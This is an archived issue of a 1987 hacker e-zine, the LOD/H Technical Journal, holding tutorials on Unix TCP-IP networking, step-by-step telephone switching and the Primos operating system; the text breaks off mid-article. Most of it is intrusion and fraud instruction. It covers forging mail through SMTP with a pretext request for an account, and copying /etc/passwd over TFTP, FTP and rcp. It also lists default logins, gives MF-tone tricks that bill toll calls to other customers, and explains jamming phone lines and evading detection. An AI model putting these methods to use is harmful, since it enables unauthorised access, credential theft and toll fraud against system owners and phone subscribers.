HaCKeRz Kr0nlcKLeZ 1

home *** CD-ROM | disk | FTP | other *** search

/ HaCKeRz Kr0nlcKLeZ 1 / HaCKeRz Kr0nlcKLeZ.iso / chibacity / lod2.txt < prev next >

Wrap

Text File | 1996-04-23 | 154.5 KB | 3,580 lines

1: Intro & Table of Contents 2: The Networked UNIX- Solid State 3: Step X Step Switching- Phantom Phreaker 4: Guide to Primos- Carrier Culprit 5: Physical Security II- Lex Luthor 6: Discrete UNIX pw Hacker- Shooting Shark 7: IBM VM/CMS Op. System- Lex Luthor 8: Network News THE LOD/H TECHNICAL JOURNAL ----------------------- INTRODUCTION: Digital Logic: 305-395-6906 New User Pass=DIGIT LOD/H Technical Journal Staff Account Number is 231. TABLE OF CONTENTS: 01 Introduction to the LOD/H Technical Journal Staff 04 K and Table Of Contents for Volume 1, Issue 2 02 The Networked Unix Solid State 17 K 03 Step By Step (SXS) Switching System Notes Phantom Phreaker 12 K 04 A Guide to the PRIMOS Operating System Carrier Culprit 25 K 05 Identifying and Defeating Physical Security and Lex Luthor 30 K Intrusion Detection Systems Part II: The Exterior 06 A Discrete Unix Password Hacker Shooting Shark 09 K 07 Hacking DEC's TOPS-20: Part II Blue Archer 25 K 08 Hacking IBM's VM/CMS Operating System, Part A. Lex Luthor 26 K 09 Hacking IBM's VM/CMS Operating System, Part B. Lex Luthor 25 K 10 Network News & Notes Staff 07 K Total: 7 articles, 10 files 180 K ------------------------------------------------------------------------------- ---------------------------- The Networked UNIX :TCP-IP by: SOLID STATE June 23 1987 ---------------------------- PREFACE I've written this article with the assumption that those reading it have a working knowledge of UNIX and large networks, specifically the DARPA Internet -- ARPAnet and MILnet. Within I offer guidance on features of the TCP-IP (Internet Transmission Control Protocol) architecture, such as FTP, TFTP, TELNET, SMTP, and the UNIX Remote Execution Facilities. Before I commence, I want to make it known that this file is not intended to be a 'why' file, but instead a 'how to' tutorial. In the event I get a good response concerning this document, I may later release a more technical oriented paper from a programmer's viewpoint. NOTE: Instances where I give examples of a command format, words in capital represent variables. For example, in the line '$ telnet HOST', HOST should be replaced (in LOWERCASE!) by the name of a system. This is just my means of distinguishing between actual commands and their options. Control characters are denoted in the form of an exponent, eg. ^H is control H. YP DATABASE Present on every UNIX that supports TCP-IP are a set of files labeled by programmers as the yellow pages, that serve as a directory of the hosts and networks accessible by your system. These files are /etc/hosts and /etc/networks respectively. There may also be a third, /etc/hosts.equiv which is a listing of those hosts that share resources and/or have users common to each other. They are ASCII text and have viewable permissions to all. Therefore it may prove helpful to print these out for reference and easy access. Entries in the above mentioned take the form: ###.###.###.### host.owner.research nicknames Example: 18.72.0.39 athena.mit.edu mit-athena athena The string of numbers, expressed in octal "dot notation", is the NetNumber of the host. Followed by the complete name, and lastly other names which it is universally known as. When attempting to access a system, any one of these identification codes may be used. NOTE: Most of the databases one will come across are incomplete or may be outdated. A complete host list can be obtained from the Network Information Control Center (NIC) at SRI International, the host name is sri-nic.arpa TELNET Telnet is the standard facility used for logging into other systems. It is found not only on UNIX, but TOPS, VMS, and all the other various operating systems found on the DDN. To activate the program: % telnet HOST [PORT] If invoked without arguments, it enters command mode, indicated by the prompt 'telnet>' From here, many functions are available. open HOST [PORT] Open connection to named computer. If PORT, which shall be explained subsequently, is ommitted then telnet will contact the TELNET server of that host. As earlier mentioned, systems can be addressed by either their NetNumber, NetName, or a nickname. close Close connection and return to command mode. quit End session and exit program. status Show current status of telnet. ie. connections and toggled options. z Suspend telnet. This allows you to operate an interactive shell on the local machine while pending an open connection to a remote host. ? COMMAND Get help on COMMAND. Or if COMMAND is ommitted, then a summary of all options is printed. Once a connection has been established, telnet enters input mode where you can communicate directly with the remote. To return to command mode, enter ^] A hacking session might look like: % telnet ucbvax.berkeley.edu Trying 10.2.0.78 ... Connected to ucbvax.berkeley.edu. Escape character is '^]'. 4.3 BSD UNIX (ucbvax.Berkeley.EDU) login: example Password: ^D Connection closed by foreign host. % PORTS Each host on the Internet runs various daemons to perform tedious upkeep jobs like recording logs, mounting disks and on UNIX, cleaning uucp and /tmp files. Along with the 'normal' daemons is one ran to accomodate communication between a host and its peers on a network. inetd the managing daemon of system to system communication has a number of various services which it regularly uses, but they can also be manually addressed via telnet. The notation, predisplayed, is simply: % telnet HOST PORT OR telnet> open HOST PORT Now each service has a port number associated with it. The number is decimal, in the range 0-1023. A database of all active services is located in the ASCII text file /etc/services From a hacker's view the following are very helpful in the process of penetrating a system: 79 Finger server. Connecting to this will give a systat report similar to one a user would get if he was on the target system and issued the finger command. Once connected to port 79, the host will sit idle until one of two things: Either a return is pressed and a general finger will result, or a username is entered where personal info will outcome. % telnet psuvax1.psu.edu 79 Trying 128.118.6.2 ... Connected to psuvax1.psu.edu. Escape character is '^]'. Login Name TTY Idle When Office opr The Operator co Sat 19:02 334 Whitmo x5-9723 hager William W. Hager d1 Sat 18:50 237-8876 georg Georg Schnitger 22 1:32 Sat 18:42 315 Whitmo x5-1406 malik Sohail Malik p0 18 Sat 19:16 214c Compu x5-0816 Connection closed by foreign host. % 11 Systat server. This can not be issued to target UNIX systems, but is applicable to VMS and TOPS where it returns data like that from finger. 25 SMTP server. This is the server used for mail among systems. It is also the most vulnerable port to attack as it can be easily fooled. With this knowledge the hacker can assume any identity he wishes through mail. For example, to send mail to guest@cc3.bbn.com from root@satnet.arpa, under normal circumstances one would have to possess the root account wherefrom he would just enter: % mail guest@cc3.bbn.com But this is not always feasible or possible! So we must resort to an indirect, devious approach.. % telnet cc3.bbn.com 25 Trying 8.3.0.5 ... Connected to cc3.bbn.com. Escape character is '^]'. 220 cc3.bbn.com. Sendmail 3.2/SMI-3.2 ready at Fri, 28 Feb 87 17:40:53 PST rcpt to: guest 250 guest... Recipient ok mail from: root@satnet.arpa 250 example... Sender ok data 354 Enter mail, end with "." on a line by itself This is an example of the SMTP port. . 250 Mail accepted ^] telnet> c Connection closed. % To summarize the text above; First, contact the remote at port 25 using telnet: % telnet HOST 25 After system link authentication, enter: rcpt to: USERNAME Ok? Type in bogus identity: mail from: USERNAME@HOST To start message: data Now, the mail: My organization has of late been discussing an upgrade to a Vax processor. The Sun computer we are currently using is immensely slow (and getting slower!) due to the demands put on it by the users. If you would allow me a demo account on your system so I may view its performance, I would be deeply grateful. Please respond to me through mail at: bogus!haha!sys1!jeff. A period on a line by itself will complete the transfer: . FTP FTP is a file transfer program that is quite powerful and helpful to the hacker in obtaining access to a target. It can be used to send and receive data. Similar to telnet, the client with which to communicate can be specified when invoked: % ftp -n HOST The -n option I always include as it disables auto-login and net-trace, an auto-feature which sends the originator's login and system name. The prompt for FTP is 'ftp>'. open HOST Establish connection to the named HOST. close Terminate connection and return to command interpreter. quit Abort program. status Show status parameters. ! COMMAND Run shell command on local machine. Like the 'z' option of telnet, if COMMAND is ommitted, than an interactive shell is invoked. ^D will return user back to the interpreter. ls Print a listing of the directory contents on the remote host in an abbreviated form. To do a long listing, enter 'dir'. cd REMOTE_DIRECTORY Change the working directory on server. pwd Print working directory on remote. lcd DIRECTORY Change the working directory on the local machine to DIRECTORY. get REMOTE_FILE LOCAL_FILE Receive the REMOTE_FILE on the remote system and name it LOCAL_FILE on the local system. send LOCAL_FILE REMOTE_FILE Send LOCAL_FILE to the host and name it REMOTE_FILE. append LOCAL_FILE REMOTE_FILE Append LOCAL_FILE to the end of the distant file, REMOTE_FILE. rename REMOTE_FILE NEW_REMOTE_FILE Give a new name to a remote file. delete REMOTE_FILE Kill REMOTE_FILE. Various other commands exist for bulk transfers and directory management. If there is any doubt ever on a command, help is always available: ftp> help COMMAND Once a connection has been made, the computer will identify itself and then go idle. (That is, if auto-logging is disabled as it should be.) To login to the system: ftp> user USERNAME Then if a pass is required, the proper prompt will appear. % ftp -n ftp> o ll-xn.arpa Connected to LL-XN.ARPA. 220 ll-xn FTP server (Version 4.103 Wed Jun 25 17:42:33 EDT 1986) ready. ftp> user anonymous 331 Guest login ok, send ident as password. Password: 230 Guest login ok, access restrictions apply. ftp> Logging on to a FTP server is different than normally entering a machine. When a remote user is operating FTP, the exchange is treated as a process of ftp or daemon, not an actual login. Therefore, a different login program, which restricts use immensely, is used. If set up properly, FTP will chroot to /usr/spool/ftp where three directories exist, bin, etc, and pub. Within /usr/spool/ftp/etc is the password file used for the FTP server login program. It is not a complete version of that in /etc/passwd, but it can be useful by providing usenames. Also of mentioning is /etc/ftpusers. This file contains multiple lines of usernames is like /usr/lib/cron/cron.deny on a Unix System V. If you are unlucky and your username appears in the file, FTP logins are denied. A few defaults are present within this doctored version of /etc/passwd that most always will provide access to a system. ACCOUNT PASSWORD ================================= anonymous anonymous, guest, ftp ftp ftp guest guest ftpser ftpser tftpser tftpser help help Each user may have in their home directory a file titled '.netrc'. This is a file containing usernames and passwords used on systems that a user commonly converses with. Entries in the file take the form: machine HOST login USERNAME password PASSWORD It is advantageous to locate all of these files on your system as they will expand not only your systems list, but also your chance of entering a computer. Once admittance has been gained, I suggest copying the /etc/passwd file for later attempts at hacking the front end of the system if other routes such as defaults, finger, TFTP (To be explained hereafter.), or by way of the remote facilities (Ditto.) are not possible. ftp> get /etc/passwd pass 200 PORT command okay. 150 Opening data connection for /etc/passwd (26.8.0.14,1389) (47 bytes). 226 Transfer complete. 48 bytes received in 0.32 seconds (0.15 Kbytes/s) ftp> close 221 Goodbye. ftp> quit % TFTP The Trivial File Transfer Program is probably the most dangerous aspect of the TCP-IP structure on the Internet. TFTP requires no account or password be present on a host system. About the only restriction is that the files inquired must have public read access permissions set. If not, an authorization failure error will result. Also, the TFTP server port must be open, otherwise no transmissions can take place. % tftp HOST Once connected, the user will get the 'tftp>' prompt where from he can grab or send files. connect HOST Set HOST up for transfers. There is no actual connection made in the sense that communication has happened, the program merely remembers what host to be used in a transfer inquiry. Therefore, there is not a disconnect command. quit Exit TFTP. status Show current set parameters. ie. HOST and timeout period. get /PATH/FILE /PATH/FILE Get /PATH/FILE from HOST and name it /PATH/FILE on local system. If no HOST has been specified yet, the form may be 'get HOST:/PATH/FILE /PATH/FILE'. put /PATH/FILE /PATH/FILE Send /PATH/FILE on local system to HOST and give it the title /PATH/FILE. As above, if HOST has not been specified, the form is 'put /PATH/FILE HOST:/PATH/FILE'. timeout SECONDS Set timeout parameter. The default is 25, that means abort transmission if no response from selected host after set period. ? COMMAND Help with TFTP. TFTP is the preferred method of file transfer. But is often closed to use due to its insecurities. To the hacker though, it is wonderful because data captured are genuine, not doctored versions as is the case with FTP. Therefore if possible, one will most likely use it to copy /etc/passwd: % tftp mit-amt tftp> get /etc/passwd /tmp/passwd Received 16453 bytes in 7 seconds. tftp> q % REMOTE PROCEDURES Additional to the standard features of the TCP setup present on all machines of the net, UNIX has a set of it's own remote system interaction commands. The set of utilities, which I affectionately call the Remote Execution Facilities, are usable only between resource sharing UNIX systems. The conglomeration of remote programs can be very helpful for overtaking other suspect targets, especially if they are part of a small network unto themselves besides being major hosts on the Internet. Before one sets out on the quest of conquering a system, it is wise to know who is currently logged on: % rusers -l HOST Rusers -l alone will print out a listing for all immediate surrounding UNIX hosts, but if a HOST is specified, only that particular computer will report. % rlogin HOST -l USERNAME If -l USERNAME is not included, the account name in use at present time will be used as the USERNAME when attempting login to HOST. If the username specified is present locally and on the distant machine in the file /etc/hosts.equiv, no password is required to login. This can be compromising to the security, a reason why the security wise will often make /etc/hosts.equiv a null file. Each user may optionally have a file, '.rhost', in his home directory. This is a personal equivalent to /etc/hosts.equiv. If you are logged into an account with such a file, no pass is required to login (via rlogin), to the computers named. Alike to the UUCP protocol, there is an allowance of the Remote Execution Facilities to preform commands on a networked system: % rsh HOST -l USERNAME "COMMAND" Remote shell will permit unlimited commands to be carried out on the remote as long as the following criteria is met: The username, if specified (If it is not, the current local one is used.), must be present on the foreign system and have remote execution privileges. Commands are effective according to the environment set in .cshrc and .login on the host. An example job: % rsh century "ps -t console" If the quotes are ommitted then variables like *?.,\ are taken literally. Also, if no redirection is submitted, than output, if the command yields it, is sent back to the issuee. Remote Copy, a sub-command of rsh, is a command similar to uucp. It must follow the criteria of Remote Shell plus all files qued must have public read permissions. % rcp HOST:/PATH/FILE HOST:/PATH/FILE For example, a common call would be the password file. So if I wanted to transfer the /etc/passwd file from harvard.arpa to rutgers: % rcp harvard.arpa:/etc/passwd rutgers:/tmp/passwd This format leaves quite alot of flexibility as it stands third party transfers are possible. If the second HOST is not inserted, than the file is put on the local system. A notable option of rcp is directory copy. It will if specified, copy a directory and all the trees beneath it...allowing you to in theory to copy the entire file system onto your local host. (uh, oh!) % rcp -d HOST:/PATH/DIRECTORY_NAME HOST:/PATH/DIRECTORY_NAME CONCLUSION In closing I would like to state that I have purposely left much information uncovered if I felt it would compromise an institution or company. I apoligize for not explaining many of the subjects discussed in the full detail they deserve, but if I had this article would have been mammoth. Any questions, challenges, comments, or criticism can be directed to me, Solid State, through any of a various boards I visit or to an LOD/H Technical Journal account of which your mail shall be somehow communicated to me. Sys Unix Comm STEP BY STEP SWITCHING NOTES BY PHANTOM PHREAKER WRITTEN FOR LOD/H TECHNICAL JOURNAL The following research was done on a class 5 Step By Step switching system. Items mentioned in this article are not guaranteed to work with your particular office. The following interesting topics about Step By Step switching are for informational and educational purposes only. This article is aimed at people who wish to learn more about telephone switching systems. I realize step-by-step switching is dwindling every day, with many electromechanical SxS offices being replaced with newer electronic/digital switches and Remote Switching Systems (RSS's). However, rural areas of the U.S. still use Step, so if you are ever in an area served by a SxS CO you may be able to use this information. 1:ANI Failure/ONI To understand this technique, you must understand how ANI functions in the Step-by-Step switching system. Your CO sends ANI, with your number, in MF or DP to receivers that collect the ANI information and store it, along with the called number, on the appropriate form of AMA tape. ANI outpulsing in MF can use either LAMA (Local Automatic Message Accounting) or CAMA (Centralized Automatic Message Accounting). ANI sent in DP type signalling can also be used, but is rare. DP vs MF trunk signalling is similar to the difference between DTMF and pulse dialing, except on a trunk. DP signalling sends all information in short bursts of 2600Hz tones. Causing ANIF's/ONI is an easy task in SxS (and some versions of Xbar), because the customer's link to the CO will allow the customer to input MF tones to influence a calls completion. This can be done by dialing a long distance number and listening to the clicks that follow. After the first click when you are done dialing, you will hear a few more. They will be timed very close to one another, and the last click occurs right before the called telephone rings. The number and speed of the clicks probably varies. Basically what these clicks are is the Toll Office that serves your CO setting up a route for your call. In order to abuse this knowledge, you need access to a MF source, whether it be a blue box, a computer with a good sound chip, tape recording, etc. Right before you hear the series of clicks, send one of the following sequences in MF: KP+1 (Repeatedly) For Automatic Number Identification Failure (ANIF) -or- KP+2 (Repeatedly) For Operator Number Identification (ONI) (Note:these will not work if your CO uses DP signalling.) Play these tones into the phone at a sufficient volume so that they 'drown out' the series of clicks. Do not send an ST signal, as you are not actually dialing on a trunk. You must send these MF sequences quickly for this method to work correctly. After you have played your 'routing' a few times, you will hear a TSPS operator intercept your call and ask for the number you are calling FROM. When an ANIF is recognized, the call is cut through to a TSPS site that serves your area. Now, you can give the operator any number in your exchange and she will enter the billing information manually, and put the call through. The toll charges will appear on the customer who owns the number you gave. You can also accomplish a similar feat by merely flashing the switchook during the series of clicks. This will send DC pulses that scramble the ANI outpulsing and cause your call to be sent to a TSPS operator before the dialed number. Be sure to stop sending the MF 'routing' after the operator attaches or she may know that something's up. Use this method sparingly and with caution. It would also be a good idea not to use the same number for billing more than one time. Don't use this method in excess, because a toll office report will list the number of ANI failures for a specific time period. The ONI method works better because it is assumed ONI is needed to identify a caller's DN upon a multi-party line. Too many ANI failures will generate a report upon a security/maintenance TTY, so if you plan on using this method, use the ONI method instead of just ANI Failure. The basic idea behind the ANIF is to scramble your ANI information by using MF (or the switchhook) to send your LD call to a TSPS operator for Operator Number Identification (ONI) due to ANI Failure. The idea behind the ONI method is that you are fooling the switch into thinking you are calling from a multi-party line and ONI is needed to identify your DN. 2:Test numbers Some other interesting things in the Step By Step system can be found by dialing test numbers. Test numbers in SxS switching systems are usually hidden in the XX99 area, as opposed to 99XX, which is common for other types of switching systems. These types of numbers are possibly physical limitations of a SxS switch, and thus a milliwatt tone or other test numbers will be placed there, because a normal DN can't be assigned such a number. However, these XX99 numbers are usually listed in COSMOS as test numbers. Another interesting note about XX99 numbers is that they seem (at least in some offices) to be on the same circuit. (That is, if one person calls an XX99 number and receives a test tone, and another person calls any other XX99 number in that same prefix, the second caller will receive a busy signal). Here we must examine the last four digits of a telephone number in detail. XXXX=WXYZ W=Thousands digit X=Hundreds digit Y=Tens digit Z=Units digit Dialing your prefix followed by an XX99 may result in a busy signal test number, a network overflow (reorder), milliwatt tones, or other type of error messages encountered when dialing. Not every XX99 number is a test number, but many are. Try looking for these in a known Step by Step office. The numbers that return a busy signal are the ones that incoming callers are connected to when the Sleeve lead of the called Directory Number is in a voltage present state, which means the line is in use or off-hook. More about this in the next topic. 3:Busy signal conferencing Another interesting feature of the Step-By-Step system is the way busy tones (60 IPM) are generated. In ESS and DMS central offices, busy signals that are sent by the terminating switch are computer generated and sound very even and clear with no signal irregularity. In SxS, all calls to a particular DN are sent to the same busy signal termination number, which can be reached most of the time by a POTS number. These busy tones are not computer generated and the voice path is not cut-off. You can take advantage of this and possibly have a 'busy signal conference'. This can be achieved by having several people dial the same busy DN that is served by a Step office, or by dialing an always-busy termination number. When you are connected to the busy signal, you will also be able to hear anyone else who has dialed the same busy number. Connection quality is very poor however, so this is not a good way to communicate. As an added bonus, answering supervision is not returned on busy numbers, and thus the call will be toll-free for all parties involved. However, you must be using AT&T as your inter-LATA carrier if the call to the busy number is an inter-LATA call for you. So if your IC is US Sprint, you must first dial the AT&T Carrier Access Code (10ATT) before the busy number. If your IC doesn't detect answer supervision, and begins billing immediately or after a certain amount of time, then you will be billed for the length of the call. 4:Temporarily 'freezing' a line A SxS switching system that operates on the direct control principle is controlled directly by what the subscriber dials. Jamming a line on SxS to prevent service is possible by simply flashing the switchook a number of times. Or you may find after several aborted dialing attempts, the line will freeze until it is reset, either manually or by some time-out mechanism. Usually the time the line is out of action is only a few minutes. The line will return a busy signal to all callers, and the subscriber who has a 'dead' phone will not even hear sidetone. This happens when one of the elements in the switch train gets jammed. The switch train consists of the linefinder, which sends a dial tone to the subscriber who lifted his telephone, and places voltage on the S (Sleeve) lead as to mark that given DN as busy. Next in the switch train are the selectors. The selectors are what receive the digits you dial and move accordingly. The last step in the switch train is the connector. The connector is what connects calls that are intraoffice, and sends calls to a Toll office when necessary. Other types of devices can be used in the switch train, such as Digit Absorbing Selectors, where needed. 5:Toll/Operator assisted dialing You may be able to dial 1/0+ numbers with your prefix included in some areas. You can dial any call that you could normally reach by dialing 1+ or 0+. For example, to dial an operator-assisted call to a number in Chicago, you could dial NXX+0312+555+1000 where NXX is your prefix, and you would receive the usual TSPS bong tone, and the number you dialed, 312+555+1000, would show up on the TSPS consoles LED readout board. You can also use a 1 in place of the 0 in the above example to put the call through as a normal toll call. This method does not bypass any type of billing, so don't get your hopes up high. The reason this works is twofold. The first reason is that the thousandths digit in many SxS offices determines the type of call. A 0 or a 1 in place of another number (which would represent a local call) is handled accordingly. The other reason is due to a Digit Absorbing Selector that can be installed in some SxS offices to 'absorb' the prefix on intraoffice calls when it is not needed to process the call. A DAS can absorb either two or three digits, depending on whether the CO needs any prefix digit(s) for intraoffice call completion. 6:Hunting prefixes SxS switches may also translate an improperly dialed local call and send it to the right area over interoffice trunks. Take for instance, you need to make a local call to 492-1000. You could dial 292-1000 and reach the exact same number, provided that there is no 292 prefix within your local calling area. However, only the first digit of a prefix may be modified or the call will not go through correctly unless you happen to have dialed a valid local prefix. You also cannot use a 1 or a 0 in place of the first prefix digit, because the switch would interpret that as either dialing a toll or an operator assisted call. 7:Trunks Step by Step switching system incoming and outgoing trunks are very likely to use In-band supervisory signalling. This means you could possibly use numbers served by a SxS CO to blue box off of. But, some older step areas may not use MF signalling, but DP signalling. DP signalling uses short bursts of 2600Hz to transfer information as opposed to Multi-Frequency tones. In DP signalling, there are no KP or ST equivalents. Boxing may be accomplished from DP trunks by sending short bursts of 2600Hz (2 bursts would be the digit 2). Acceptable pulse rates are 7.5 to 12 pulses per second, but the normal rate is 10 pulses per second. A pulse consists of an 'on hook' (2600Hz) tone and an off-hook (no tone). So, at 10 pulses per second, a digit might be .04 seconds of tone and .06 seconds of silence. DP is rarely used today, but some direct-control Step offices still use it. Common Control Step offices are much more likely to use MF trunk signalling. As said at the start of this file, some of the things mentioned here may have no practical use, but are being exposed to the public and to those who did not know about any one of the procedures mentioned here previously. References and acknowledgements =============================================================================== Basic Telephone Switching Systems-By David Talley, Hayden publishers No. 1 AMARC-Bell System Technical Journal Mark Tabas for information about CAMA and DP, The Marauder, and Doom Prophet. =============================================================================== Gfiles: (1-8, ^3),?,Q : The LOD/H Technical Journal: File #4 of 10 Written by, Carrier Culprit and The Legion Of Hackers This is Part I of a II part series on the PRIME operating system. In this article I will give a general overview of the system and command usage. Note: This article will center around the Primos version 19, and revisions 19.1 and up. [Background Information] Primos is the operating system for the PRIME mainframe, and supermini systems. The operating system is usually run on the Prime 750. Primos is a relatively secure system. Externally security is great, but the internal security needs help. The latest revision of version 19 is 19.4.0 (as of this writing). This revision is more secure in both external and internal security than its predecessors. By the time this article is released, Version 20 should be out and an article on that version will be forthcoming. [Logging in V18.x.x] It is quite easy to hack into a Prime running a version 18 of Primos. The external security is rather poor. All you need is an ID to logon. There is no password prompt, thus getting an operator's account is rather easy. Occasionally, there will be some additional security software running and passwords will be needed. I am not going to go into detail on version 18 because it is obsolete, any questions regarding version 18 please leave me mail. [Logging in V19.x.x] A Primos system is very easy to recognize. Once you are connected, hit a few returns to get the "ER!" prompt or you may be prompted with the ID prompt. If you do get prompted with the ID prompt, you need not put "Login" in front of the ID. Here is an example of a Primos login: ATDT 123-4567 [2 RETURNS] ER! Login CARRIER Password: Prime (user 31) Logged in Friday, 5-Sept 14:27:20 Welcome to Primos Version 19.4.5 Last login Thursday, Sept 4 1986 02:01:12 (1 mail waiting) Note: You usually get 1 try to login before being disconnected. In some cases the 2 c/r's are not needed and some systems won't respond until you type "login" and a return. Passwords and ID's are 6 characters, they may consist of letters and numbers. Finding passwords on a Primos can be hard, but there are some common ID's and passwords. You must use "login" before entering your ID. In this case my ID is "CARRIER". Here is a common list of ID's and passwords I have come across: =============================== | ID name | Password | =============================== | PRIME | PRIME | | *SYSTEM | SYSTEM | | PRIMOS | PRIMOS | | *ADMIN | ADMIN | | RJE | RJE | | DEMO | DEMO | | GAMES | GAMES | | GUEST | GUEST | | REGIST | REGIST | | TEST | TEST | | NETMAN | NETMAN | | PRIRUN | PRIRUN | | TOOLS | TOOLS | | CMDNC0 | CMDMNC0 | | +TELENET | TELENET | =============================== Note: * means that that ID is most likely to have SYS1 priorities. Note: + account belongs to Telenet or some employees of Telenet in which the Primos will be located on the Telenet packet network. System Accounts: SYSTEM- This account usually contains configuration programs. It also contains system messages, logs, and userlists. TOOLS- This account usually contains the utility to add users and the Netlink utility (Explained later). CMDNC0- Contains help files. These are default accounts which are standard in new Primos systems. They should be there unless the userfile has been modified by the system operator. You can also mix them around, ie- Login SYSTEM Password:PRIME There is no "systat" or extensive on-line help before logging in. Don't you wish people would model their operating systems after TOPS-10 (chuckle)? The best account to get on under would be an account with SYS1 priorities. This account is for people who advise regular users. Ok, lets assume you have hacked onto a regular account something like games. The command prompt for Primos is "OK,". The first thing we would want to do is to see who is logged in. We would type "Users" and would get something like this: OK, Users Users=8 This is telling us that there are 8 users currently logged in, which isn't extremely helpful. To get a full listing of usernames we would type "Status Users" or "Status -Users". We would get a status of users currently on-line. It would show us usernames, devices, and other sub-categories. Here's a sample of what you would get: User Number Device ADMIN 3 <MDF0> SYSTEM 1 <MFD0> <MFD1> OBB 31 <MFD0> CRIMINAL 12 <MFD1> If you see that other people are logged in, it may be best to log off and call back later, as the operators can perform the same command, and if they know that user should not be on the system at that time, you will obviously be kicked off. If there are 2 devices specified, the user is either receiving output from a different device, sending input to that device, or has logged out incorrectly (tsk tsk). To get a full status of memory and accounting, you would type "Status System" This is usually in a Menu driven program, and you will get different options. ie- Log of users, memory, devices, etc. We can access different priority levels by using the "CHAP" command. This is the way we can find out what our priority level is. We would do: OK, CHAP UP OK, CHAP DOWN X or CHAP DOWN to return to your original priority level: OK, CHAP ORIGIN or CHAP DEFAULT Usually a user may leave his priority level rather low. You can then try to raise your level. There should be 6 different priority levels. A 0 meaning lowest, and 6 meaning highest. Here is a little diagram that will give you a list of ID's and what most of them will have access to. Note: Some may have access to more or less than what I have written, but the comments are accurate for most systems. !=================================================! ! ID ! Comments ! !=================================================! ! GAMES !Allows user to view low level ! ! !directories, and execute regular! ! !commands. ie-CHAP, STATUS ! !=================================================! ! DEMO !Allows user to run games, and ! ! !execute the tour program. Most ! ! !commands will not work, and it ! ! !has a time limit. Lastly, it can! ! !only access low lvl directories.! !=================================================! ! PRIME !Allows user to execute all ! ! !commands, except operator cmds. ! ! !User can also access PRIMENET if! ! !the system supports it. Access ! ! !to only low level directories. ! !=================================================! ! ADMIN !Access to view all directories &! ! !bypass all ACL'S. Can setup an ! ! !accounts on other Primos systems! ! !via PRIMENET (if available). ! ! !User can execute any command. ! !=================================================! ! SYSTEM !Same as ADMIN, except cannot ! ! !view feedback to ADMINS. ! !=================================================! ! RJE !Same as games, except a RJE ! ! !user can erase user log and spy.! !=================================================! ! TEST !Able to access any directory, ! ! !only restriction is a test user ! ! !is not authorized to shut down ! ! !the system. ! !=================================================! Note: RJE is a Remote Job Entry Priority levels may vary on different Primos systems, they can range from 0- to any number up to 10. The most common range is 0-6. On some Primos systems you can do a CHAP PRIORITY to see what the range is. Ok, we have checked priorities, and the system status. Lets move to directories. To list a directory type "LD" short for List Directory. This will list the directory you are attached to. In this case it will be your home directory. You will get a list of files within your own directory. To view someone elses directory you would type AT nameofdirectory. Lets say we are logged into a DEMO account. And we would like to view the files in the GAMES account. We could do either of the following: OK, AT GAMES This is telling the system we would like to default to the Games directory. This is similar to the Set Default name on a VAX/VMS system. (See Lex Luthor's Hacking VAX/VMS 3 part series for more information on VMS) or we could do OK, FUTIL >AT GAMES This is the same thing, except in the first method you can still execute Primos commands while still attached to the Games account. But when using FUTIL (File UTILity program) you can only list, create and copy files. To get out of the file utility program just hit a Control P. Here is a chart of file types and how to execute them: ------------------------------------------- | File type | How to execute it | =========================================== | .CPL | CPL pathname | | .SAVE | SAVE pathname | | .SEG | SEG pathname | | .BASICV | BASICV pathname | | .TXT | SLIST pathname | | .COM | CO pathname | ------------------------------------------- Note: SLIST will also show the program lines of the file, whether it be a CPL file or COM file. This is a good way to learn CPL (Command Procedure Language). Most files will not have suffixes. To execute them type "Resume pathname", filenames are called pathnames on PRIMOS. Unlike VMS, the PRIMOS system doesn't have the type of file as a suffix. On some files you'll get the suffix, but if not try: Resume pathname and that should execute the file, especially files with an "*" preceding them. If a file is in the format of, "*filename" do "Resume *filename". Usually basic files have an * preceding their titles. To create a directory type: OK, Create directname [-password] [-access] A password can be from 1-6 letters, if I wanted to have a password on my directory I would do- OK, Create directname [-limp] [-access] If you don't put in an access level, the directory will automatically be set to ALL access. Here's a list of access rights: P = Protect a directory D = Delete entries from directory A = Add entries to directory L = Read the contents within directory U = Attach to a directory R = Read contents of a file W = Edit contents of a file ALL = All of the Above^^^^^ NONE = Denies all access Typically, if you are logged into a DEMO account your directory will be set to ALL access. If it is, someone can attach to the demo directory and do anything they want with it. Here is a list of accounts and what access they will usually have on their directory. DEMO = ALL GAMES = LUR PRIME = ALL SYSTEM = LUR ADMIN = NONE TEST = LUR JBB = NONE RJE = LUR Most directories have LUR access which is access to read contents of the directory, attach to the directory, and read contents of a file. If you have enough privileges (priority levels) you can do the following to change the access rights: OK, Set_Access ALL [-LUR] This is setting access from ALL to LUR. ALL was the present access, now we changed it to LUR. You should only do this if it's your own personal account as changing access rights on hacked accounts could lead to your detection and subsequent expulsion from the system. To create a file, preferably a text file, type "Mail pathname", then you will be thrown into the Mail subsystem which I believe is version 3.1 now. You can type in all the info you want, when finished hit a Control-P. It will ask you for a pathname to save it to. Enter the name you would like. It will look something like this: OK, Mail DOE Mail 3.1 >Hello. This is your system operator. Any ideas on how to keep those >pesky little computer criminals out of our system? >Comments can be directed to SYSTEM. Enter Filename: Pesky.Txt The above method is rather primative but works good if you are only creating a text file. It is a common method used on version 18, and is easy to perform. The other method is more common on version 19, and is commonly used today. OK, Create Test.Txt OK, Ed EDIT $ Note: $ is not dropping you into DCL, so you DCL programmers are out of luck (chuckle). From the $ prompt you can type 'help' to get a list of commands which can be used in the Editor. $ (return) By hitting return we are given the "&" prompt, here we can input our file. Or if you know CPL you can start programming. Do not hit return on a blank line or you will be thrown into the main Editor prompt ('$'). & Hello this is Bif (the system operator) I am testing the Editor & because we have added new enhancements. This is only a test. & (return) Thus by hitting return we are given the $ prompt once again. To save our file we can type- $ Save Test In this case the filename is test. The system will reply by saying 'Test Saved'. The file should be located at the end of the files list when you List files. To make sure the contents are saved type "Slist Test.Txt", it will display the text you typed in mail or the editor. A couple of important notes: 1: Never use a "?" anywhere in the file, or it will erase all of the contents in the file. 2: Never hit a c/r twice. In other words if you hit a c/r on a blank line the system will recognize this as mail and will send it to the name you entered. If you want to make a basic program or basicv type "Basic" or "BasicV" at the "Ok," prompt and you will be thrown into that language. If you would like to make a CPL program you can enter it from the main prompt since that is the default language for Primos. To delete a file just type "Delete filename". To get a list of directories with their ACLs (Access Control Lists) type "List_Access". It would look something like this: OK, LIST_ACCESS ACL "<Current Directory>": ADMIN : NONE DEMO : LUR SYSTEM : LUR ROBERT : ALL GAMES : LUR PRIME : ALL To get a listing of just files type "Listing", it will give you a list of files in the directory you're attached to. The only difference between this method and "LD" is that LD tells you what access rights is on that directory. <Tour Program> On some Prime systems you may find a program located within the Demo or Games account. The name of the program is "Tour" and you can execute it by doing 